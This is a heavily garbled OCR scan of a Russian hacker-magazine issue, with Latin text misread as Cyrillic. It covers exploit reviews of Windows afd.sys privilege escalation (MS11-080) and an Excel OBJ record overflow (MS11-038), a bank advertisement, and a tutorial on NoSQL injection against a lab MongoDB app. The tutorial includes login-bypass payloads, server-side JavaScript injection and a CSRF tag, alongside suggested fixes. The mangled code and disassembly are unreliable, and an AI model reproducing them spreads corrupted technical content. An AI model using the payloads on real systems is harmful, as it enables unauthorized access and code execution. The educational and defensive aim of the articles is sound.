-рмгііе($-рр, ргіпі_г($_Р05Т., ТКІІЕ'П ог 
сІіеГ 'СоиІсІп-Ч ыгііе сіаіа іо біе!"); 

-Рс1озе($-Рр) ; 

есііо "Раіа иріоасіесі іо <а Ііге^Ѵ'бІез.іхіѴ^бІез.іхік/аЯ " : 

} 



ТАК6ЕТ5 



Апсігоісі < 2.3.4. 



Боилчсж 



1. Отключить ^ ѵа$сгір( в стандартном браузере. 

2 . Использовать альтернативный браузер. 

М511-080: повышение привилегий 
с помощью уязвимости в драйвере АРй 



СѴ55Ѵ2 7.2 



(АѴ:І_/АС:І_/Аи:М/С:С/І:С/А:С) 

ШНІ 

Уязвимость, позволяющая получить системные привилегии при 
исполнении кода на локальной системе, была обнаружена товари- 
щем Во 2Ьои. Эта уязвимость, скрывающаяся в недрах драй вера аісі. 
вуз (апсіІІагуРипсііоп сігіѵег), обусловлена неправильной проверкой 
входных да иных, передаваемых в режим ядра из режима пользова- 
теля. В случае успешной эксплуатации этой уязви мости локальный 
атакующий получает возможность вы пол нить произвольный код и, 
соответственно, добиться полного контроля над системой. 

Драйвер а ЕсІ . зуз представляет собой прослойку между 
драйвером ТСР/ІР- стека Ісрір.зуз и библиотекой пользо- 
вательского уровня ѴѴіпзоск. Он регистрируется как N РІ - 
провайдер и предоставляет доступ к сокетам режима ядра 
ѴѴіпзоск КегпеІ (ѴѴ5К). 



ЕХРЮІТ 



Уязвимость сокрыта в функции АШоіпІ_еаБ В ходе ее анализа 
выяснилось, что она может пол учить управление в случае, если 
в драйвер а^сі приходит I ОСИ с кодом 0x1 20Ь Ь: 

РАСЕАРР : Ѳ0Ѳ1В19Ѳ ; зісісаіі А-РсІРіз р аісІіРеѵісеСопігоКх. х) 



РАСЕАРР : 0001В1С4 шоу [есіх+і], аі 



РАСЕАРР : 0001В1С7 


тоѵ 


езі., А-РсИгрСа11РІ5раісб[езі] 


: если ІОСИ с 


кодом 


0х12ѲЬЬ, то езі == 0x12270 


РАСЕАРР :0001В1СР 


іезі 


езі. езі 


РАСЕАРР :0001В1СР 


І2 


Іос 21АРЗ 


РАСЕАРР :0001В1Р5 


саіі 


езі : саіі А-РсПоіпІ_еа-Р 



.сІаіа:ѲѲѲ121В8 _А-РсИгрСа11РізраісІі 66 о-Різеі @А-РсІВіпсІ@8 
.сіаіа :ѲѲѲ121В8 ; РАТА ХРЕЕР : АісІ РізраісІіРеѵісеС опі гоІ (х . х^) 

.сіаіа :0Ѳ0121В8 ; АісІВіпсІ( х.х) 



.сіаіа : 00012270 сісі оі-Рзеі @АісІЗоіпІеа-Р@8 
; АісІЗоіпІ.еа-Р(х < х’) 



Чтобы мы могли добраться до уязвимого базового блока, должно 
быть выполнено несколько требований: 

• размер входного буфера должен бытьбольше 0x18; 

• размер выходногобуфера должен бытьравен 0; 

• четвертый йѴѴОРО во входном буфередолжен бытьравен 
0x00000001; 

• значениеѴѴОРО'а поадресу [входной буфер + 0x34], увеличенное 
на 8, должно быть меньше или равно [размер входного буфера - 
ОхС] 
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ВредоносныйЗаѵаБсгірІ-коддляАпсІгоісІ 



РАСЕ :00016СЮ 
РАСЕ :00016С1Р 
РАСЕ : 00016С22 


тоѵ 

тоѵ 

хоп 


еЬх, есіх ; указатель на ІКР 51:аск 
[еЬр+Ігр] . есх ; есх = пакет ІКР 
е5І л еві 


РАСЕ : 00016С24 


тоѵ 


[еЬр+ѵаг 20] ^ еві 


РАСЕ : 00016С27 


тоѵ 


_Х_еЬр+Р] л еві 


РАСЕ : 00016С2А 
РАСЕ : 00016С2О 
РАСЕ :00016С30 


тоѵ 

стр 

іь : 


еах, [еЬх+8] ; размер входного бѵсЬеоа 
еах, 18 Іі ; должен быть больше 0x18 
Іос 170Е2 


РАСЕ :00016С36 
РАСЕ : 00016С39 


тоѵ 

стр 


есіх. [еЬх+4] : размер выходного бѵфера 
ес1х л еві ; должен быть == 0 


РАСЕ : 00016СЗВ 


3? ■ 


БІіогІ: 1ос_16С46 



Теперь необходимо записать наши данные в выходной буфер 
ІРР. Для осуществления этой затеи нужно вызвать функцию 
АМРевІагУоіп в базовом блоке по адресу 0x0001 6^54. В итоге это 
приведет к вызову функции Аі'сІСоппесіАрсКегпеІРоиІіпе, которая 
попытается записать ІМТ5ТАТІІ5-код в выходной буфер ІРР (в на- 
шем случае код равен 0хС0000207). Записав в буфер значение 
ОхСО 0 00207 без учета выравнивания, мы сможем вызывать наш 
шелл -код в пространстве пользователя по адресу 0х000207хх. 



ТАВ 6 ЕТ 5 



ѴѴіпсІоѵѵвХРЗегѵісе РаскЗ, ѴѴіпсІоѵѵвХР Ргоі'еввіопаІ х64Е0Шоп 
Зегѵісе Раск2, ѴѴіпбо\л/5 5егѵег2003 5егѵісе Раск2, ѴѴіпбоѵѵзЗегѵег 
2003x64 ЕсІШоп Зегѵісе Раск2, ѴѴіпсІоѵѵв Зегѵег 2003 5Р2 для иапіит- 
ЬавесІ-систем. 



ЗОИЛІОЫ 



Существует обновление, устраняющее эту уязвим ость. 



Уязвимость М511-038 в МісгозоН (Шісе 
ЕхсеІ, возникающая при обработке записи 



ОЕи и приводящая к переполнению буфера 



СѴ55Ѵ2 



(АѴ:М/АС:М/Аи:І\І/С:С/І:С/А:С) 

МгЛЗД 

Для использования этой уязвимости атакующий должен за- 
ставить пользователя открыть специальным образом сформиро- 
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ванный хі 5- фай л. В результате у атакующего появится воз- 
можность выполнить произвольный код на локальной машине 
с правами пользователя, запустившего уязвимое приложение. 



ЕХРЮІТ 



Запись О В Э в ЕхсеІ определяет та кие объекты, как І_іпе, 
Ресіапдиіаг, элементуправленияСбескВохит. д. Существуют 
разные типы 0 ВЭ-за пи сей, отличающиеся дочерними записями. 
Структура дочерних записей идентична структуре файлов фор- 
мата ВІРР. 

Это означает, что первые два байта представляют собой 
идентификаторы дочерней записи, следующие два байта указы- 
вают размер данных, а далее следуют сами данные. Приведем 
список возможных дочерних записей: 



Дочерняя запись 


Значение 


Описание 


-РіЕпсІ 


006 




Коней ОВЗ -записи 


(Зарезервировано) 


016 






(Зарезервировано) 


026 






(Зарезервировано) 


036 






ійМасго 


046 




Ртіа-віѵіе тасго 


-РііВігЫіоп 


056 




СоттапсІ Ьиііоп 


-Рібто 


066 




бгоир тагкег 


ійс-р 


076 




СІірЬоагсІ Тогтаі 


-РіРіобгЬіІ: 


086 




Рісіиге орііоп Р1а§в 


-РіРісіРтІа 


096 




Рісіиге -Ртіа-вііуіе тасго 


ійСЫв 


0А6 




Сбеск Ьох Ппк 


-РіКЬо 


0В6 




Касііо Ьиііііоп 


•РЬБЬв 


0С6 




Бсгоіі Ьаг 


ійІЧів 


0Р6 




ІМоіе зігисіиге 


-РІіБЬзРтІа 


0Е6 




Бсгоіі Ьаг -Ртіа-вііуіе тасго 


-РіСЬоОаІга 


0Р6 




Сгоир Ьох сіаіа 


■РІіЕсІоРаІіа 


106 




Есііі сопігоі сіаіа 


•РІіКЬоРаІіа 


116 




Касііо Ьиііііоп сіаіа 


■РІіСЫзРаІіа 


126 




Сбеск Ьох сіаіа 


■Р1:І.ЬзРа1:а 


136 




І_ів1: Ьох сіаііа 


-РіСЫвРтІа 


146 




Сбеск Ьох Ііпк -Ртіа-віуіе тасго 


-РіСто 


156 




Данные объекта 


Первой всегда идет доч ер ня я запись Й Сто, а последней — ЙЕпсІ. 
Перечислим также поля подзаписи ЙСто: 


Смешение Имя поля 


Размер 


Содержимое 


0 ій 




2 


ИйСто (156) 


2 сЬ 




2 


Размер данных -РіСто 


4 йі; 




2 


Тип объекта 



6 

8 

14 



ісі 

§гЬі1: 



(КевегѵесІ) 12 



Идентификатор ІР объекта 
Опциональные флаги 
Зарезервировано; должно =^Ѳ 



Значения в функции виЬ_30164Е23, относящиеся к дочерней 
записи, сохраняются в буфере. Далее, как следует из кода, 
выполняется обработка дочерней записи. Одной из функций, 
участвующих в обработке, является функция зиЬЗОІ 2РАВС: 



.1:ех1::ЗѲ12РАС8 тоѵ есіі ^ [еЬр+аг§_0] 



. 1=ех1= : ЗѲ12РАСВ 


хог 


еві^ еві 


.іехі : 3012РАСР 


стр 


сЫогсІ_307Е1РВ4., еві 


. 1=ех1= : ЗѲ12РАРЗ 


тоѵ 


еЬх,, [есіі+б] 


.іехі : ЗѲ12РАР6 


тоѵ 


[еЬр+ѵаг_4] . еві 


. йехі: : ЗѲ12РАР9 


тоѵ 


[еЬр+ѵаг_4С] , еві 


.іехі : 3012РАРС 


тоѵ 


[еЬр+ѵаг 48]., еві 


.іехі : 3012РАРР 


тоѵ 


[еЬр+ѵаг 44] , еві 


. 1=ех1= : ЗѲ12РАЕ2 


тоѵ 


[еЬр+ѵаг_40] ^ еві 


. 1=ех1= : ЗѲ12РАЕ5 


Іа 


1ос_30274818 


.іехі: : 3012РАЕВ 


стр 


с1ыогс1_307РВ7А4^ еві 


.іехі : 3012РАР1 


Іш 


вбогіі Іос 3012РАРВ 



,1=ех1=: ЗѲ12РАРЗ с тр еЬх, еві 



.іехі : 3012РАР5 


ІП2 




Іос 30127293 




.іехі: 30127293 


ривб 


сіыогсі ріг [еЬх+4] 


.іехі : 30127296 


саІІ 


виЬ 30127263 



В первой строке дизассемблерного листинга происходит копиро- 
вание адреса буфера, содержащего записи ЙСто, в регистр есіі. 

Затем в еЬх копируется значение по смещению 0x6 в этом 
буфере. Если ты обратил внимание на структуру ЙС то, то должен 
был заметить, что, начиная с этого офсета, 12 байт резервируют- 
ся. Поэтому результат, который копируется в еЬх, представляет 
собой первые четыре байта зарезервированного значения. 

Если ты посмотришь на последующий код, то увидишь, что 
по адресу 0x30127293 значение контролируемого нами регистра 
еЬх+4 заносится в стек. Впоследствии оно используется в каче- 
стве аргумента функции зиЬ_30 127263. На этом шаге фактически 
и возникает уязвимость, поскольку никаких проверок того, до- 
пустимо ли значение для еЬх, не проводится. 

Функция зиЬ ЗОІ 27263 прибавляет к значению аргумента 
(которое мы контролируем) 0x10 и передает результат в функцию 
М50_804. 



. Іе хі: : 3 01 27263 ризіі еЬр 



. іехі : 30127264 


тоѵ 


еЬр, 


евр 


. іехі : 30127266 


тоѵ 


еах., 


_[еЬр+аг§_0] 


. іехі : 30127269 


ривб 


еві 




. іехі : 3012726А 


тоѵ 


еві. 


[еах+0А6] 


. іехі: : ЗѲ12726Р 


ривб 


еві 




. іехі : 3012726Е 


саІІ 


МБО 


804 : Г 307Р538С 1 





Функция М50_804 увеличивает свой аргумент на 0x3с и возвра- 
щает полученный результат. 



ЗѲЕ27РВѲ 


РЦ5Н_ЕВР 




30Е27РВ1 


МОѴ ЕВР.ЕБР 




30Е27РВЗ 


МОУ ЕАХ.РЫОКР РТК 


55 : _[_Е В Р + 8 ] 


30Е27РВ6 


ТЕ5Т ЕАХ., ЕАХ 




30Е27РВ8 


1 Е шзо . 30С7А572 




30Е27РВЕ 


МОѴ ЕАХ . РІлІОКР РТК 


Р5: [ЕАХ+ЗС] 


30Е27РС1 


РОР ЕВР 




30Е27РС2 


КЕТІЧ 4 





Значение, возвращаемое функцией М50_804 (досихпорна- 
ходящееся под нашим контролем) сохраняется в регистре есх. 
А затем следует констркуция саІІ сіѵѵогсі ріг [есх+0х1 1 ]... 



. іехі : 30127274 


іеві 


еах., 


еах 


. іехі : 30127276 


") 2 


вбогі 


1ос_3012728Е 


.іехі: 30127278 


тоѵ 


есх. 


[еах] 


.іехі : ЗѲ12727А 


Іеа 


есіх. 


[еЬр+аг§_0] 


. іехі: : ЗѲ12727Р 


ривб 


есіх 




. іехі : 3012727Е 


ривб 


0ВЕ6 




. іехі : 30127283 


ривб 


еві 




. 1=ех1= : 30127284 


ривб 


еах 





. іехі : З Ѳ127285 саІІ сімогсі ріг [есх+ІІСІі] 

; < — передаем управление на полезную нагрузку 



ТАК0ЕТ5 



М іеговой Ойісе ЕхсеІ 2002 1 0.2614.2625 Зегѵісе Раск 0 (Ойісе 
ХР) оп ѴѴіпбоѵѵз ХР 5РЗ, М іеговой Ойісе ЕхсеІ 2002 10.6501.6626 
Зегѵісе РаскЗ (Ойісе ХР5РЗ) оп ѴѴіпсІоѵѵв ХР 5 РЗ. 



50ЫІТКШ 



Существует обновление, устраняющее эту уязвимость. ПС 
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на правах рекламы 




А Альфа-Банк 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а так же заказав по телефонам: 

(495) 229-2222 в Москве 1 8-800-333-2-333 в регионах России (звонок бесплатный) 

или на сайте 

ѵѵѵттапсагсі.ги 



(дате)ІапЛ 



ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 29.01.1998 №1326" 




Илья Вербицкий (Ыод.сЫѵаѵаз.огд) 




"отальный 



иѵѵ 

На нашем дискеты 
найдешь подробное 
обучающее видео 
ко всем описанным 
в статье примерам, 
а также все 
необходимые файлы 
и исходники. 



дестрои 

МопдсЮВ 

РАЗОБЛАЧЕНИЕ МИФА 
О БЕЗОПАСНОСТИ N0501 СУБД 



ѵтѵѵ 

ѵѵѵѵѵѵ.топдоіІЬ.огд — 
официальный сайт 
МопдойВ; 

посІеІБ.огд — 
официальный сайт 
Мосіе^; 

ги.ѵѵікіресііа.огд/ 

Йі/Ш- 

подробнооМоБСИ; 

поаоІ-сіаІаЬаае.огд 
— портал 

с огромным ІМоБСІІ-- 
сообществом. 



Ресііз, МопдойВ, тетсасИесІ — все эти программные продукты относятся к классу нереляционных 
СУБД, противоположному популярным Му5(ЗІ_, Огасіе ОаІаЬазе и М350Б. Так как интерес 
к перечисленным базам данных в последнее время значительно возрос, хакеры всех мастей просто 
не могли пройти мимо них. Давай же окунемся в увлекательный мир ІМо5СІІ_-инъекций! 
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Тотальный дестрой МопдоРВ 



ЧТО ТАКОЕ N0501 

Думаю, ты знаком с реляционной моделью СУБД, согласно которой 
база данных состоит из сущностей (таблиц), связанных между собой. 
Доступ к данным осуществляется с помощью БОБ — структуриро- 
ванного языка запросов. За примерами реляционных СУБД далеко 
ходить не надо: МуБОБ, Огасіе, МісгозоН БОБ Бегѵег. Все остальные 
СУБД, архитектура которым отличается от классической реляцион- 
ной модели, смело можно отнести к классу ІМоБСІБ-решений: 

• различные варианты хеш-таблиц (Ресііз, ВідТаЫе, тетсасбесі); 

• документо-ориентированные базы данных (МопдойВ, СоисЬОВ); 

• базы данных, основанные на графах ( N е о 4 ) , Бопез СгарбОВ); 

• объектно-ориентированные базы данных (б Ь4о, Сасбе, Засіе); 

• ХМБ-ориентированныебазы данных (еХІ5Б ВазеХ). 

Основное отличие 1\1о5С1Б-СУБД от их 5(ЭБ-ориентирова иных конку- 
рентов заключается в отсутствии единого, унифицированного языка 
запросов. Например, МопдоБВ использует в качестве языка запросов 
В50ІМ, еХізІ применяетХОиегу, а Бопіс ОгарЬОВ требует от разработчика 
знания СгарЫЗБ, языка запросов к данным, имеющим вид графов. По- 
пулярность І\Іо50Б-СУБД растете каждым днем, что не может не сказы- 
ваться на насстобой. Совсем скоро, буквально завтра, тебе придется 
искатьне5С!І_-инъекции,а ІМоБСіБ-инъекции вочередном проекте. 
Небудемтерятьвремени и поговоримопотенциальныхуязвимостях. 

ТАК ЛИ БЕЗОПАСНЫ ИОВСИ-СУБД? 

Довольно часто я слышу утверждение, что нереляционные СУБД 
безопасны, так как они не используют БОБ и злоумышленник 
не может провести на них атаки типа БОБ-іщесІіоп. В какой-то 
степени это верно: нет БОБ — нет БОБ-инъекций. Но, если в си- 
стему невозможно внедрить БОБ-код, это еще не значит, что она 
безопасна. ІМоБОБ закрывает одну потенциальную уязвимость, при 
этом открывая с десяток других, которые позволяют совершать 
разнообразные вредоносные действия: 

• манипулировать с РЕБТ-интерфейсом и подделывать межсайто- 
выезапросы (СБРР); 

• использовать регулярные выражения в параметрах запроса; 

• выполнятьскрипты на сервере, если на нем установлена ІМоБСіБ- 
СУБД (например, МопдойВ позволяет за пускать ЗаѵаБсгірІ-код); 

• получать доступ к данным через специальный интерфейс, под- 
держиваемый СУБД (БОБ в реляционных базах да иных, В50ІМ 

в МопдойВ ит. д.), и, если используется язык запросов, «исправ- 
лять»эти запросы. 

Рассмотрим типовую архитектуру приложения с доступом к храни- 
лищу да иных ІМоБОБ. Обычно она состоит из трех у ровней: 

• приложение; 

• АРІ базы данных ІМоБСіЕ; 

• ЫоБОБ-СУБД. 

Злоумышленник может атаковать каждый из этих уровней. Нач- 
нем с самого нижнего уровня, то есть непосредственно с СУБД. Как 
и любое приложение, СУБД может быть подвержена атакам перепол- 
нения буфера или иметьуязвимую схему аутентификации. Атаковать 




Статистика поисковыхзапросов о N0501 в боодіе ІпзідГіІв 




Пример базы данных, построенной на графах 

этотуровень довольно сложно, потому что сообщество, сформиро- 
вавшееся вокруг продукта, и сама компания-разработчик стараются 
исправлять ошибки по мере их обнаружения. Но у тебя есть очень 
большое преимущество: большинство программных продуктов 
поставляются с исходным кодом, а значит, ты вполне сможешь его 
проанализировать и, возможно, найти что-нибудь стоящее. Если тебе 
повезет, то в твоих руках окажется ключ практически к любой базе 
данных!Следующий уровень — клиентское АРБ Большинство ІМоБСіБ- 
СУБД имеют целый зоопарк различных библиотек для доступа 
к данным. Стоит отметить, что большинство библиотек представляют 
собой проекты с открытым исходным кодом, но часть из них уже 
не поддерживается. Вероятность обнаружить уязвимость в клиент- 
ской библиотеке значительно выше, чем непосредственно в самой 
СУБД. И даже если тебе не посчастливится найти ту единственную 
уязвимость, которая откроет доступ ко всем приложениям, построен- 
ным на основе этого АРІ, ты будешь представлять, как именно проис- 
ходит диалог между клиентским кодом и сервером баз данных, какой 
используется протокол и можно ли перехватить сессию. 

Ну и наконец, верхний уровень — приложение, которое ты соби- 
раешься взломать. Здесь тебе прежде всего нужно найти те места, 
где программист забыл проверить входные данные, и попытаться 
их проэксплуатировать. В данном случае нужно использовать тот 
же подход, что и при поиске БОБ-инъекций, то есть анализировать 
код и сообщения об ошибках, только на этот раз придется разби- 
раться с ЗБОЫ, ЗаѵаБсгірІ или чем-то подобным. 

Итак, настало время для взлома! Сегодня нашей целью будет 
МопдойВ — одна из самых распространенных І\Іо50Б-СУБД. 

N0501- ИНЪЕКЦИИ В М0М600В 

Мы будем взламывать небольшое ѵѵеЬ-приложение. Его исходный код 
и весь необходимый софтты найдешь на диске, прилагаемом к журналу 
(процесс установки подробно описан в файле РЕАОМЕ.РБІ.М). Если 
установка пройдетуспешно, то приложение должно быть доступно 
по адресу Ьир://127.0. 0.1:31337. Основные атаки, о которых сегодня 
пойдет речь: 

• инъекции в регулярныхвыражениях; 

• ЗБОІМ-инъекции; 

• манипуляции с РЕБТ-интерфейсом; 

• ЗаѵаБсгірІ-инъекции. 

Начнем со взлома при помощи ошибок в использовании регулярных 
выражений. 

ИНЪЕКЦИИ В РЕГУЛЯРНЫХ ВЫРАЖЕНИЯХ 

МопдойВ, как и многие другие ІМоБОЕ-СУБД, позволяет осущест- 
влять поиск с помощью регулярных выражений. Это очень мощное, 
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ѴѴеЬ-интерфейс МопдоРВ 



но в то же время опасное средство, которое может нанести суще- 
ственный вред при неправильном использовании. 

Для поиска с помощью регулярных выражений в МопдойВ 
используют оператор $гедех. Например, запрос «верни мне всех 
пользователей, логин которых начинается с "го"», будет выглядеть 
следующим образом: 

сІЬ.и5ег5.1іпсІ({ 1о§іп :^^$ге§ех: " Л го" } }). 

Кстати, если ты не знаком с языком запросов МопдойВ, то 
рекомендую начать его изучение с руководства разработчика, 
которое находится по адресу ііі.Іѵ/сдѴѴІ ВН . Но вернемся к нашему 
приложению. Открой тестовый ѵѵеЬ-сайт и выбери пункт «Инъек- 
ции в регулярных выражениях» в меню МопдойВ. Посмотрим, как 
устроена эта страница. Открой файл топдобЬдв в папке І_іЬ. В нем 
реализован класс МопдоОЬСопІгоІІег, который отвечает за функ- 



ГЛОССАРИЙ 



• РЕ5Т (Рергезепіаііопаі з*а*е ІгапБ^ег) — подход к разработке 
архитектуры распределенных систем, который подразумевает, 
что каждый объект системы однозначно определяется 
глобальным идентификатором, например ІІВІ_. Каждый ІІГСІ_, 

в свою очередь, имеет строго определенный формат. Управление 
сервисом основано на протоколе передачи данных. Обычно это 
НТТР или НТТР5, который поддерживает минимальный набор 
операций над объектами: СЕТ (получить), РСІТ (добавить), РОСТ 
(сохранить) и РЕБЕТЕ (удалить). 

• ВЗОЫ (Віпагу ЗаѵаБсгір* 0Ь]ес* І\Ыа*іоп) — это бинарная форма 
представления простых структур данных и ассоциативных 
массивов. Название произошло от широко распространенного 

формата обмена данными 350 N и неофициально 
расшифровывается как бинарный 350Ы (Віпагу 350ІЧ). 



ционирование всех страниц в приложении. Сейчас нас интересует 
метод гедехр: 

ѵаг ге^ехрРшс! = пем Ке^Ехр(" л " + равБШгсІ. "і"); 

ѵаг Іо^іпРагаш = { 1о§іп: 1о§іп. раззыогсі: ге^ехрРыс! }; 

Как видишь, аутентификация пользователя происходит по- 
средством запроса, который указывает регулярное выражение 
в качестве пароля. При этом переменная раззѵѵогсі никак не филь- 
труется, что открывает нам полную свободу действий. Здесь ты 
можешь указать имя пользователя гооі и регулярное выражение 
вместо пароля, например [\б\ 5]*. В результате МопдойВ выполнит 
следующий запрос: сІЬ.и5еп5.-бпсІ0пе({1о§іп: 'гоо^', разБілюпсІ: 
/ л [\б\5]*/і}), и ты успешно войдешь на уязвимый сайт под логином 
гооі (этот прием напоминает классическую 5СІІ_-инъекцию «1‘ ог 1=1 
--»). Защититься от подобной атаки довольно просто. Во-первых, 
всегда проверяй входные данные, откуда бы они ни поступили — 
напрямую от пользователя, или из внешнего файла, или из базы 
данных. Перед использованием данных в программе их следует 
проверять. Во-вторых, используй регулярные выражения только 
в тех случаях, когда это действительно необходимо. Например, 
приведенный выше запрос можно переписать воттаким образом: 

сІЬ. ивегБ .бпсІ0пе({ 1о§іп: , гоо1: , 1 раввыргсі: ' р@55ы0гсІ 1 

Как видишь, он безопаснее и при этом выполняется быстрее. 

^ОКІ-ИНЪЕКЦИИ 

Да, МопдойВ не поддерживает 501, но СУБД не может обойтись 
без языка запросов. Разработчики МопдоБВ решили использовать 
вместо 50І_ популярнейший текстовый формат обмена данными 
350Ы (В50ІМ). Таким образом, можно попробовать осуществить 
разного рода атаки-инъекции (конечно, если входные данные 
не фильтруются). Такие атаки обычно называют 350І\І-инъекциями. 

Итак, снова открывай наше приложение и переходи на страницу 
«350І\І-инъекции». Как и в предыдущем примере, ты увидишь поле 
для ввода имени пользователя и пароля. Давай рассмотрим код, 
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отвечающий за процесс аутентификации на этой странице. Он со- 
держится в методе Ізоп-іщесііоп класса МопдоОЬСопІгоІІег: 

ѵаг Іо^іпРагаш = еѵа1("({ 1о§іп: + 1о§іп + 

раззыогсі: ' " + равзмогсі + } )”); 

Вышеприведенный код преобразует текстовое представление 
объекта ^ѵаБсгірІ (запроса к МопдойВ) в объект. После передачи 
этого объекта на сервер баз данных происходит аутентификация 
пользователя. В этом куске кода есть одно очень слабое место — 
входные данные никак не контролируются, поэтому ты можешь 
сформировать практически любой запрос к базе! Например, укажи 
имя пользователя «поо^'})//» (пароль вводить необязательно) 
и нажми на кнопку «Войти». Поздравляю, ты снова вошел в систе- 
му! Кактак получилось? Все очень просто. Ты указал имя пользо- 
вателя «поо^ 1 })//», и в функции еѵаі произошел следующий фокус: 

//Переданное значение 

({ 1о§іп: ' гооі : 1 }) // 1 , раБзыогсІ: '* 

//Получившийся запрос 

сІЬ.и5ег5.бпсІ0пе({ Іо&іп: ' гоо-Ь' }) 

На самом деле этот скрипт даже еще опаснее, так как с его 
помощью ты можешь выполнить любой код ^ѵаБсгірІ на ѵѵеЬ- 
сервере. Например, имя пользователя «' + ргосеББ.ехесРаіЬ})//» 
сформирует запрос вида 

сІЬ.и5ег5.бпсЮпе({ Іо^іп: , С:\\посIе.еxе , 

Уязвимости такого типа называются Бегѵег Бісіе ^ѵаБсгірІ 
Іщесііопз или просто 55Л. Как же защититься от подобных атак? 

1. Проверяй все данные из внешних источников. Например, логин 
должен соответствовать регулярному выражения « л [а-гА-2]+$». 

2 . Никогда не используй функцию еѵаі для работы с ^ОІМ. В І\Ые. 
ІБДОСтупна функция ^ОІМ.рагзе, которая парситвходную строку 
и создает объект на ее основе. 

МАНИПУЛЯЦИИ С РЕ5Т-ИНТЕРФЕЙС0М 

В связи с бурным развитием интернета и сервис-ориентированной 
архитектуры (БОА) все большую популярность набирают РЕ5Т- 
решения. Так как большинство современных нереляционных СУБД 
организовано в соответствии с последними тенденциям в индустрии, 
то многие из таких систем либо сами реализуют РЕ5Т, либо исполь- 
зуют сторонние продукты для доступа к данным с помощью РЕБТІиІ- 
архитектуры. МопдойВ не исключение: в эту СУБД входит простой 
РЕБТ-интерфейс который позволяет получить доступ кданным в ре- 
жиме «Только чтение». Кроме того, существует проект под названием 
БІееру Мопдоозе, который реализует полную поддержку РЕ5Т. 

Давай посмотрим, как работает РЕБТ-интерфейс, встроенный 
в МопдойВ. Сервер СУБД должен быть запущен с параметром «— 
гезі». РЕБТ-сервис доступен по адресу Ыір://127.0. 0.1:28017/. Это 
очень простое ѵѵеЬ-приложение, которое отображает информацию 
о текущем состоянии СУБД и позволяет формировать запросы 
к базам данных. Вот несколько интересных ссылок: 




Стандартная архитектура доступа к данным в ІЧоЗСИ-СУБД 

• /ІІБ^Оа-СаЬаБеБр'Ьех^І — списокбаз данных; 

• /5егѵегБ1:а1:и5?1:ех1:=1 — текущее состояние сервера. 

В общем случае для формирования РЕБТ-запроса к базе данных 
используется ІІРБ следующего вида: 

ІтЬѣр : //127 .0.0.1: 28017/база_данных/коллекция/ ? 
б11:ег_поле=значение 



На странице «Манипуляции с РЕБТ-интерфейсом» нашего 
ѵѵеЬ-приложения происходит аутентификация пользователя при 
помощи РЕБТ-интерфейса МопдойВ. Она реализована в методе 
гезі класса МопдоОЬСопІгоІІег: 

ѵаг гезІіОгѵ = "/зесиге^оздІ/изегз/РЫ-ЬеГ-Іо^іп^' 

+ Іо^іп + "&б11:ег ра55шгс1=" + раззмогсі; 
ѵаг ЬазЬ = гезІЮгу . ігісІехО-РГ'#" ); 

і-р (ЬазЬ > - 1 ) { гезІіОгу = гезІіОгу . зиЬз1:гіп%(Ѳ. ЬазЮ ; } 

Скрипт формирует РЕБТ-запрос, игнорируя при этом все данные 
после символа #. Когда РЕБТ-запрос готов, скрипт формирует 
НТТР-запрос к серверу и ожидает результат в формате ^ОІМ. 

К примеру, запрос информации о пользователе гооі в базе данных 
5есиге_по5дІ выглядит следующим образом: Ыір://127.0. 0.1:28017/ 
5есиге_по5дІ/и5ег5/?ІіІІеНодіп=гооІ&ПІІег_ра55\люгб=рЙ55\л/0гсІ. 
Всё бы хорошо, но в коде есть ошибка, проявляющая себя при об- 
работке символа #. Если ты попробуешь войти с именем «гооі#», 
то окажешься залогиненным в системе. Проблема, обусловленная 
формированием следующего ІІРБ: МИр://ІосаІМоБІ:2801 7/зесиге_ 
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по5дІ/и5егз/?ЯІІег_Іодіп=гооІ#&ПІІег_ра55ѵѵогб=. состоит в том, что 
параметр П11ег_раз5\л/огб был проигнорирован и аутентификация 
проходила посредством запроса Ьир://ІосаІЬозЕ28017/зесиге_ 
поздІ/изегз/ѴІчІІеНодіп^ооЕ 

Стоит отметить, что большинство ПЕБТ-интерфейсов также 
уязвимы к подделке межсайтовых запросов (СБПЕ): 

<іт% 5гс="1і1:1:р: //1оса1Ііо5І::28017/5есиге_по5д1/и5ег5/" /> 

Честно говоря, я довольно скептически отношусь к РЕБТ^иІ- 
архитектуре, так как она открывает большие возможности для 
злоумышленников. Постарайся не использовать РЕ5Т. Но если без 
него никак, то предварительно прочитай статью РоЬизІ йеіюпзез 
іюг Сгозз-Бііе Редиезі Еогдегу ( ЬіБІу/сЬѴБѵУ ). в которой очень под- 
робно описаны все аспекты безопасности РЕ5Т. 

МѴА5СРІРТ- ИНЪЕКЦИИ 

Большинство современных реляционных СУБД позволяют созда- 
вать хранимые процедуры. Давай рассмотрим МісгозоЙ БОБ Бегѵег, 
который расширяет возможности АЫБІ БОБ и позволяет соблюдать 
практически любые требования бизнес-приложений. Если тебе 
не хватает возможностей Т-5СІБ (это диалект БОБ, реализованный 
в БОБ Бегѵег), то ты можешь написать хранимую процедуру на С# 
или любом другом .ЫЕТ-совместимом языке. 

МопдойВ обладает не менее богатыми возможностями, в число 
которых входит серверный баѵаБсгірБ Фактически ты можешь вы- 
полнить почти любой код на сервере баз данных. С одной стороны, 



это позволяет писать очень сложные приложения для обработки 
данных, с другой — делает твое приложение более уязвимым. 

Где можно использовать ЭаѵаБсгірІ: в МопдойВ? 

1. Запросы с оператором $ѵѵІіеге. Например, запрос бЬ.огбегз. 
бпб({ $ыГіеге: "ІіГііз.атоипІ: > 3" }) вернеттебе списокзаказов, 
количество пунктов в которыхбольшетрех. 

2. Команда бЬ.еѵаБ К примеру, бЬ.еѵа1("-Рипс1:іоп (х) { пе^ипп х * х; 
}", 2) вернетчетыре. 

3. Функциидля сохранения в базе данных. МопдойВ позволяет 
сохранять функции, написанные на языке баѵаБсгірБ в базе дан- 
ных. Для этого используется специальная системная коллекция 
зузіепгщз. Чтобы создать новуюхранимуюфункцикНоо(х), выпол- 
ни следующий код: 

бЬ.зѵзІіет. дз.заѵеГ { ісі : "-Роо". ѵаіие: -Рипсіііоп (х^) 

I геііигп х * х; }}) 

Теперь можешь попробовать вызвать ее воттак:бЬ.еѵа1("-Роо(2)"). 

4. Мар/Пебисе. Мар/Ребисе — это программный фреймворк, разра- 
ботанный компанией Ооодіедля параллельных вычислений над 
большими объемами данных. Он содержитдве операции: тар, 
используемую для предварительной обработки данных, и гебисе, 
осуществляющую поиск результата. 

МопдоБВ позволяет запускать операции тар/гебисе на сер- 
вере баз данных. Операции по распараллеливанию процессов 
